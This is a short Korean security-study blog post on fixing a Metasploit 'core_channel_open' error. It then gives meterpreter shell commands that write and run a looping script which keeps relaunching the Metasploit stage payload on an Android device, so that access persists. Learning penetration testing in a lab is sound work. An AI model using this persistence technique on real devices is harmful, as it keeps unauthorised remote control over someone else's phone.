Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 | 29 |
| 30 |
Tags
- ㅂ
- CentOS
- VPN
- BTr3
- defrag
- VMwares
- 실습
- 제어판
- mount
- 프로젝트
- 윈도우
- cybersecurity
- 예시
- window
- 정보보안
- network
- DiskQuata
- backtrack
- 오류
- debian
- 네트워크
- 윈도우서버
- 볼륨
- TrueCrypt
- Linux
- 윈도우볼륨축소
- ipsec
- redhat
- 마운트
Archives
- Today
- Total
정보 보안을 향한 항해
meta "[-] core_channel_open: Operation failed: 1" 오류 해결 본문
1. 명령어
set AutoLoadStdapi true
2. 연결 후 영구 설정
meterpreter > shell
Process 1 created.
Channel 1 created.
touch persistentscript.sh
echo "#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 10
done
" > persistentscript.sh
sh persistentscript.sh